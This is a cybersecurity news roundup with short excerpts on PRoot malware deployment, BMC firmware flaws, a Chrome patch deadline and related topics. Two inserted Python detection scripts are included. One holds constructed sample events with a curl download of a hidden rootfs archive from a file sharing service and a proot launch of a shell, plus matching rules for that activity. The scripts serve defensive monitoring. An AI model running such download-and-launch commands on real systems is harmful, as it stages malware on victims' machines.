CyberSecurity Updates

Threat Actors Abuse PRoot Linux Utility to Simplify Malware Deployment

Threat actors observed using this technique have hosted the compressed filesystem containing their malware on free file sharing services such as Google Drive, Dropbox, or OneDrive, making it readily retrievable from victim devices. Organizations should monitor for connections to these file sharing services, especially ones that are not commonly used in the organization’s business processes. Organizations may also find it useful to monitor for the execution of the PRoot tool,…
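The two monitoring recommendations above (egress to consumer file sharing services, and execution of the PRoot binary) as a worked detection, added here as an example rather than taken from the original article. It assumes an EDR or auditd-style pipeline that emits one JSON event per line with the field names used below (type, host, pid, exe, argv, dest_host); those names, the sample events, and the per-host sanctioned-service policy are all constructed for the example.

```python
"""Added example (not from the original article): flag PRoot launches and
unsanctioned egress to consumer file sharing services, then escalate hosts
that show both. All events below are constructed for the example."""
from dataclasses import dataclass
import json
import os

# Assumed pipeline format: one JSON object per line; field names are this
# example's own and must be mapped to whatever your sensor actually emits.
CONSTRUCTED_EVENTS = """
{"type": "exec", "host": "web01", "pid": 4012, "exe": "/usr/bin/curl", "argv": ["curl", "-sLo", "/tmp/.rootfs.tar.gz", "https://drive.google.com/uc?id=EXAMPLE"]}
{"type": "net", "host": "web01", "pid": 4012, "dest_host": "drive.google.com", "dest_port": 443}
{"type": "exec", "host": "web01", "pid": 4020, "exe": "/tmp/.p/proot", "argv": ["proot", "-S", "/tmp/.rootfs", "-b", "/proc", "/bin/sh"]}
{"type": "exec", "host": "build02", "pid": 771, "exe": "/usr/bin/git", "argv": ["git", "pull"]}
{"type": "net", "host": "build02", "pid": 771, "dest_host": "github.com", "dest_port": 443}
{"type": "net", "host": "hr03", "pid": 1500, "dest_host": "www.dropbox.com", "dest_port": 443}
""".strip()

# Services named in the article; suffix matching also catches subdomains.
FILE_SHARING_DOMAINS = ("drive.google.com", "dropbox.com", "onedrive.live.com", "1drv.ms")

# Assumed policy: hosts where a given service is a sanctioned business tool.
SANCTIONED = {"hr03": {"dropbox.com"}}


@dataclass(frozen=True)
class Finding:
    host: str
    pid: int
    rule: str
    detail: str


def _domain_matches(dest: str, domain: str) -> bool:
    """True if dest is domain or a subdomain of it (not merely a suffix string)."""
    dest = dest.lower().rstrip(".")
    return dest == domain or dest.endswith("." + domain)


def analyze(events_text: str) -> list:
    """Return findings for PRoot execution and unsanctioned file-sharing egress."""
    findings = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        host, pid = ev["host"], ev["pid"]
        if ev["type"] == "exec":
            # Match on basename of the executable and argv[0]: attackers drop
            # proot under arbitrary paths, so the full path is not a stable signal.
            names = {os.path.basename(ev["exe"]), os.path.basename(ev["argv"][0])}
            if "proot" in names:
                findings.append(Finding(host, pid, "proot_exec", " ".join(ev["argv"])))
        elif ev["type"] == "net":
            dest = ev["dest_host"]
            for domain in FILE_SHARING_DOMAINS:
                if _domain_matches(dest, domain) and domain not in SANCTIONED.get(host, set()):
                    findings.append(Finding(host, pid, "file_sharing_egress", dest))
                    break
    return findings


def hosts_with_both(findings: list) -> set:
    """Hosts showing both file-sharing egress and a PRoot launch: escalate first."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, set()).add(f.rule)
    return {h for h, rules in by_host.items() if {"proot_exec", "file_sharing_egress"} <= rules}


if __name__ == "__main__":
    found = analyze(CONSTRUCTED_EVENTS)
    for f in found:
        print(f"{f.host} pid={f.pid} {f.rule}: {f.detail}")
    print("escalate:", sorted(hosts_with_both(found)))
```

Neither signal is conclusive on its own: file sharing egress is common in many environments, and PRoot has legitimate uses. The correlation in hosts_with_both is what raises the priority; tune SANCTIONED to the services your business actually uses rather than suppressing the rule globally.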


CISA Orders Agencies to Patch Google Chrome Vulnerability

This is the ninth high-severity bug for which Chrome has released a patch during 2022. CISA has given federal agencies three weeks to patch their systems. Because of this timeline, technical details of the vulnerability are unlikely to be published before the deadline. Any organization with users running Google Chrome should treat CISA’s deadline as a guideline for itself and endeavor to have all systems…


Three BMC Vulnerabilities Impact Manufacturers Industrywide

Much of the risk from these vulnerabilities can be mitigated by controlling access to remote management interfaces. Companies should never leave them exposed to the internet, and should further limit which devices or networks can reach them. User behavior analysis can help identify exploitation of vulnerabilities like these: mass password reset requests and root-level activity that departs from baseline can be reliable indicators of compromise. https://thehackernews.com/2022/12/new-bmc-supply-chain-vulnerabilities.html
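The two indicators named above, a burst of password resets on one BMC and root-level access from outside the management network, as a worked detection. This is an added example, not code from the article or from any BMC vendor. It assumes BMC audit events have been forwarded to syslog in the simple line format shown (timestamp, BMC hostname, event name, user, source IP); the event names, the management allowlist, and the log lines themselves are constructed for the example.

```python
"""Added example (not from the original article): sliding-window detection of
mass password resets per BMC, plus root logins from outside the management
network. Log format, event names and sample lines are constructed."""
from collections import deque
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
import re

# Assumed format: "<ISO timestamp> <bmc-host> <event> user=<name> src=<ip>".
CONSTRUCTED_LOG = """
2022-12-06T09:00:01 bmc-r1-01 password_reset user=admin src=10.20.0.5
2022-12-06T09:00:02 bmc-r1-01 password_reset user=operator src=10.20.0.5
2022-12-06T09:00:03 bmc-r1-01 password_reset user=svc_backup src=10.20.0.5
2022-12-06T09:00:04 bmc-r1-01 password_reset user=svc_monitor src=10.20.0.5
2022-12-06T09:00:20 bmc-r1-01 root_login user=root src=10.20.0.5
2022-12-06T09:05:00 bmc-r1-02 password_reset user=admin src=10.20.0.9
2022-12-06T11:30:00 bmc-r1-02 root_login user=root src=203.0.113.7
""".strip()

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) user=(\S+) src=(\S+)$")

# Assumed policy: only the out-of-band management VLAN may reach a BMC.
MANAGEMENT_NETS = [ip_network("10.20.0.0/24")]
# Assumed baseline: three or more resets on one BMC within five minutes is abnormal.
RESET_THRESHOLD = 3
RESET_WINDOW = timedelta(minutes=5)


def parse(log_text):
    """Yield (timestamp, host, event, user, src) tuples; skip unparseable lines."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # in production, count these too: gaps in audit data matter
        ts, host, event, user, src = m.groups()
        yield datetime.fromisoformat(ts), host, event, user, src


def detect(log_text):
    """Return (host, rule, detail) alerts in the order the log triggers them."""
    alerts = []
    recent = {}    # host -> deque of reset timestamps still inside the window
    fired = set()  # (host, rule) already alerted, so a burst alerts only once
    for ts, host, event, user, src in parse(log_text):
        if event == "password_reset":
            q = recent.setdefault(host, deque())
            q.append(ts)
            while q and ts - q[0] > RESET_WINDOW:
                q.popleft()
            if len(q) >= RESET_THRESHOLD and (host, "mass_password_reset") not in fired:
                fired.add((host, "mass_password_reset"))
                alerts.append((host, "mass_password_reset",
                               f"{len(q)} resets within {RESET_WINDOW}"))
        elif event == "root_login":
            addr = ip_address(src)
            if not any(addr in net for net in MANAGEMENT_NETS):
                alerts.append((host, "root_login_outside_mgmt", src))
    return alerts


if __name__ == "__main__":
    for host, rule, detail in detect(CONSTRUCTED_LOG):
        print(f"{host}: {rule} ({detail})")
```

A scheduled credential rotation will trip the reset rule too, so suppress it for announced change windows rather than raising the threshold. The root-login rule only has teeth if the allowlist matches the network controls the article recommends; if the BMC is reachable from anywhere, the source address tells you little.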


Three Ways to Improve Defense Readiness Using MITRE D3FEND

Created and maintained by MITRE, MITRE D3FEND is a framework that provides a library of defensive cybersecurity countermeasures and technical components to help organizations improve their defensive posture. MITRE D3FEND is complementary to the MITRE ATT&CK framework, which is a library of adversary tactics, techniques, and procedures (TTPs). D3FEND maps relationships between ATT&CK’s TTPs and defensive countermeasures, so that defensive strategies can be developed against known attacker behavior.

Using D3FEND To Bolster Defensive Readiness

D3FEND gives organizations a…


Flaws in MegaRAC baseboard management firmware impact many server brands

Researchers have found three vulnerabilities in AMI MegaRAC, baseboard management controller (BMC) firmware used by multiple server manufacturers. If exploited, the flaws could allow attackers to remotely control servers, deploy malware and firmware implants, or trigger damaging actions that leave servers inoperable. BMCs are microcontrollers on server motherboards with their own firmware, dedicated memory, power, and network ports; they provide out-of-band management of servers when their main operating systems are…


Action1 launches threat actor filtering to block remote management platform abuse

Action1 has announced new AI-based threat actor filtering to detect and block abuse of its remote management platform. The cloud-native patch management, remote access, and remote monitoring and management (RMM) firm stated that its platform has been upgraded to spot abnormal user behavior and automatically block threat actors, preventing attackers from exploiting its tool to carry out malicious activity. The release comes amid a trend of hackers misusing legitimate systems management platforms to deploy ransomware or…


The global state of the cyber security industry 2022

Introduction to cyber security in 2022

Cyber security is central to operational success

Cyber security practitioners entered 2022 under the shadow of the Log4Shell vulnerability. The vulnerability sent shockwaves throughout the cyber security world and has continued to be used by threat actors. Just months into 2022, statements from government organizations such as the Cybersecurity and Infrastructure Security Agency (CISA) in the US and the UK’s National Cyber Security Centre (NCSC) called on organizations, especially…


Tractors vs. threat actors: How to hack a farm

Forget pests for a minute. Modern farms also face another – and more insidious – breed of threat. While I was in the UK police force and part of the National Cyber Crime Unit in 2018, I was asked to give a talk on cybersecurity at a National Farmers’ Union (NFU) meeting in southern England. Right after I started my talk, one farmer immediately raised his hand and told me that his cows had recently…


Ping of death! FreeBSD fixes crashtastic bug in network tool

by Paul Ducklin One of the first low-level network tools that any computer user learns about is the venerable ping utility. Named after the eponymous sound effect from any and every old-school war movie scene involving submarines, the command is a metaphorical echo (see what we did there?) of the underwater version of RADAR known as SONAR. You send out a p-i-n-g (more like a d-o-i-n-n-n-n-g noise, in reality) into the briny depths, and by…


What you should know when considering cyber insurance in 2023

As the frequency and severity of ransomware, phishing, and denial of service attacks has increased, so has demand for cyber insurance. About $6.5 billion in direct written premiums were recorded in 2021, a 61% increase over the prior year, according to an October 2022 memorandum from the National Association of Insurance Commissioners. “Some companies see it as essential to their risk management strategy,” says Heather Engel, managing partner at advisory firm Strategic Cyber Partners. However, experts say…
